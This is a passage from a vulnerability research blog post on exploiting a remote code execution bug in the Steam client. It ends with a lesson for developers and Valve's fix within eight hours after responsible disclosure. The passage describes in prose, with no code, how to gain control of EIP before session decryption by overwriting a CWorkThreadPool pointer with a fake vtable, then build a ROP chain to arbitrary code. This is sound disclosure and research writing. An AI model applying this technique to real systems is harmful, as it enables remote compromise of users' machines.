This presents a problem for exploitation as we do not know the encryption key, which is derived on a per-session basis. This means that any ROP code/shellcode that we send down will be ‘decrypted’ using AES256, turning our data into junk. It is therefore necessary to find a route to exploitation that occurs very soon after packet reception, before the decryption routines have a chance to run over the payload contained in the packet buffer.

ACHIEVING CODE EXECUTION

Given the encryption limitation stated above, exploitation must be achieved before any decryption is performed on the incoming data. This adds additional constraints, but is still achievable by overwriting a pointer to a CWorkThreadPool object stored in a predictable location within the data section of the binary. While the details and inner workings of this class are unclear, the name suggests it maintains a pool of threads that can be used when ‘work’ needs to be done. Inspecting some debug strings within the binary, encryption and decryption appear to be two of these work items (E.g. CWorkItemNetFilterEncryptCWorkItemNetFilterDecrypt), and so the CWorkThreadPool class would get involved when those jobs are queued. Overwriting this pointer with a location of our choice allows us to fake a vtable pointer and associated vtable, allowing us to gain execution when, for example, CWorkThreadPool::AddWorkItem() is called, which is necessarily prior to any decryption occurring.

Figure 5 shows a successful exploitation up to the point that EIP is controlled.

Figure 5

From here, a ROP chain can be created that leads to execution of arbitrary code. The video below demonstrates an attacker remotely launching the Windows calculator app on a fully patched version of Windows 10.

Conclusion

If you’ve made it to this section of the blog, thank you for sticking with it! I hope it is clear that this was a very simple bug, made relatively straightforward to exploit due to a lack of modern exploit protections. The vulnerable code was probably very old, but as it was otherwise in good working order, the developers likely saw no reason to go near it or update their build scripts. The lesson here is that as a developer it is important to periodically include aging code and build systems in your reviews to ensure they conform to modern security standards, even if the actual functionality of the code has remained unchanged. The fact that such a simple bug with such serious consequences has existed in such a popular software platform for so many years may be surprising to find in 2018 and should serve as encouragement to all vulnerability researchers to find and report more of them!

As a final note, it is worth commenting on the responsible disclosure process. This bug was disclosed to Valve in an email to their security team (security@valvesoftware.com) at around 4pm GMT and just 8 hours later a fix had been produced and pushed to the beta branch of the Steam client. As a result, Valve now hold the top spot in the (imaginary) Context fastest-to-fix leaderboard, a welcome change from the often lengthy back-and-forth process often encountered when disclosing to other vendors.

A page detailing all updates to the Steam client can be found at https://store.steampowered.com/news/38412/